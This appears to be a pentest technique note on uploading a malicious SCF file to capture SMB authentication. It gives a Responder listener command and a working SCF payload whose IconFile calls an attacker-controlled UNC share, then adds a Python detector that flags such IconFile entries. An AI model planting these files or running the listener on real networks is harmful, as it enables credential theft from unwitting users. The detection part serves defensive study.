Malicious SCF File Upload

windows, rce, foothold, smb

Overview #

An attacker can upload a malicious SCF file that will connect back to an attacker-controlled SMB share once a victim browses the directory containing it.

One way the SCF file gets triggered is when explorer.exe renders the folder it sits in, for example:

%SystemRoot%\explorer.exe "C:\Users\victim\desktop"

Environment Setup #

Steps #

Start a Responder listener on the interface the victim can reach (tun0 here), so the victim's inbound SMB connection is captured:

sudo responder -I tun0

Content of the SCF file placed in the directory the victim will browse; IconFile points at the attacker's SMB share, which Explorer contacts while rendering the folder's icons:

[Shell]
Command=2
IconFile=\\10.10.14.13\share\icon.ico
[Taskbar]
Command=ToggleDesktop
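From the defender's side, the tell-tale sign of this technique is an SCF file whose IconFile points at a UNC path on a host that is not one of your own file servers. The following is an added detection example (not part of the original note): it parses SCF/INI text and flags such IconFile entries, using the SCF body above as a constructed sample; the `allowed_hosts` list is an assumption you would fill with your own servers.

```python
import re
from dataclasses import dataclass

# Constructed sample: the SCF body from the note above, with its IP kept as written.
SAMPLE_SCF = """[Shell]
Command=2
IconFile=\\\\10.10.14.13\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Matches \\host\rest or //host/rest (Explorer accepts either slash style).
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/](.*)$")


@dataclass
class ScfFinding:
    section: str  # section the key was found in, lower-cased
    key: str      # offending key, lower-cased
    host: str     # remote host named in the UNC path
    path: str     # share and file part after the host


def parse_scf(text):
    """Parse INI-style SCF text into {section: {key: value}}; names are lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def find_unc_icon_paths(text, allowed_hosts=()):
    """Return a finding for each IconFile that points to a UNC path on a non-allowed host."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for section, kv in parse_scf(text).items():
        value = kv.get("iconfile")
        m = UNC_RE.match(value) if value else None
        if m and m.group(1).lower() not in allowed:
            findings.append(ScfFinding(section, "iconfile", m.group(1), m.group(2)))
    return findings
```

Run this over SCF files landing on upload directories or writable shares; pairing it with egress filtering of TCP 445 removes the outbound connection even when a file slips through.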

Reference #